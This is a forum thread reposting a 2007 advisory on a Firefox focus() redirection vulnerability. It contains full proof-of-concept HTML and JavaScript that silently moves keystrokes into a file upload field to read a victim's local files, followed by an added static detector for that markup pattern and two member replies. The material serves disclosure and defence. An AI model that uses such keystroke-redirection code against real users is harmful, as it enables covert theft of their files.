  [Announcement]   Mozilla Firefox focus() Redirection Vulnerability 05/07/2007 18:20:25 (+0700) | #1 | 69057
conmale
Administrator

Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Mozilla Firefox focus() Redirection Vulnerability
------------------------------------------------------------------------


SUMMARY
A vulnerability in Mozilla Firefox allows the attacker to silently redirect focus of selected key press events to an otherwise protected file upload form field. This is possible because of how the onKeyDown event is handled, allowing the focus to be moved between the two. This enables the attacker to read arbitrary files on the victim's system.

DETAILS
Vulnerable Systems:
* Mozilla Firefox version 2.0.0.4 and prior

Exploit:
Code:
<html>
<body>
<script>
function restore()
{
 
 document.getElementById("text1").value=document.getElementById("file1").value;
 document.getElementById("text1").focus();
}

function doKeyDown()
{
 document.getElementById("label1").focus();
}
</script>

<input type="file" id="file1" name="file1" onkeydown="restore();" onkeyup="restore()" />
<label for="file1" id="label1" name="label1"></label>
<br>
<textarea name="text1" id="text1" onkeydown="doKeyDown()">
</textarea>
</body>
</html>


ADDITIONAL INFORMATION
The information has been provided by carl hardwick <mailto:hardwick.carl@gmail.com>.
The original article can be found at:
http://yathong.googlepages.com/FirefoxFocusBug.html
What bringing us together is stronger than what pulling us apart.
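The focus shift described in the advisory summary can be looked for statically in page markup. The following is an added example, not part of the original post or advisory: a JavaScript heuristic that flags key event handlers on non-file elements that move focus to a file input or to a label bound to one. The function names and the sample markup are constructed for illustration.

```javascript
// Added example: static heuristic for the focus-redirection markup pattern.
// Names and sample are constructed. Limits: regex-based; quoted attributes and brace-free function bodies only.
function parseAttrs(tag) {
  const attrs = {};
  for (const m of tag.matchAll(/([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)')/g)) {
    attrs[m[1].toLowerCase()] = m[2] !== undefined ? m[2] : m[3];
  }
  return attrs;
}
// Ids on which a script snippet calls getElementById(...).focus().
function focusedIds(code) {
  const re = /getElementById\(\s*["']([^"']+)["']\s*\)\s*\.focus\s*\(/g;
  return [...code.matchAll(re)].map(m => m[1]);
}
function findFocusRedirection(html) {
  const tags = [...html.matchAll(/<(input|label|textarea|select|button)\b[^>]*>/gi)]
    .map(m => ({ name: m[1].toLowerCase(), attrs: parseAttrs(m[0]) }));
  const isFile = t => t.name === 'input' && (t.attrs.type || '').toLowerCase() === 'file';
  // Sensitive focus targets: file inputs and labels bound to them with for=.
  const fileIds = new Set(tags.filter(isFile).map(t => t.attrs.id).filter(Boolean));
  const sensitive = new Set(fileIds);
  for (const t of tags) {
    if (t.name === 'label' && t.attrs.id && fileIds.has(t.attrs.for)) sensitive.add(t.attrs.id);
  }
  // Map each named function to the ids it focuses.
  const fnFocus = new Map();
  for (const m of html.matchAll(/function\s+(\w+)\s*\([^)]*\)\s*\{([^}]*)\}/g)) {
    fnFocus.set(m[1], focusedIds(m[2]));
  }
  const findings = [];
  for (const t of tags.filter(t => !isFile(t))) {
    for (const ev of ['onkeydown', 'onkeypress', 'onkeyup']) {
      const handler = t.attrs[ev] || '';
      const ids = focusedIds(handler);   // focus calls written inline in the attribute
      for (const [fn, fnIds] of fnFocus) {
        if (new RegExp('\\b' + fn + '\\s*\\(').test(handler)) ids.push(...fnIds);
      }
      for (const id of ids) {
        if (sensitive.has(id)) findings.push({ element: t.attrs.id || t.name, event: ev, focuses: id });
      }
    }
  }
  return findings;
}
// Constructed sample: a textarea whose keydown handler focuses a label tied to a file input.
const SUSPICIOUS = `<script>function shift() { document.getElementById("uploadLabel").focus(); }</script>
<input type="file" id="upload"><label for="upload" id="uploadLabel"></label>
<textarea id="notes" onkeydown="shift()"></textarea>`;
console.log(findFocusRedirection(SUSPICIOUS));
```

A hit is a lead for manual review, not proof of abuse; handlers attached with addEventListener or built dynamically are outside what this heuristic sees.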
  [Question]   Mozilla Firefox focus() Redirection Vulnerability 05/07/2007 22:53:00 (+0700) | #2 | 69084
minhquan1712
Member

Joined: 07/09/2006 16:17:25
Messages: 240
The page you gave, bro, is just an implementation of the exploit code; it doesn't say anything more. Sigh, it's a bit hard to understand, I guess I'll have to dig into it more T_T
  [Question]   Mozilla Firefox focus() Redirection Vulnerability 05/07/2007 22:55:10 (+0700) | #3 | 69086
minhquan1712
Member

Joined: 07/09/2006 16:17:25
Messages: 240
It seems the text field below records whatever is typed in the text field above, right???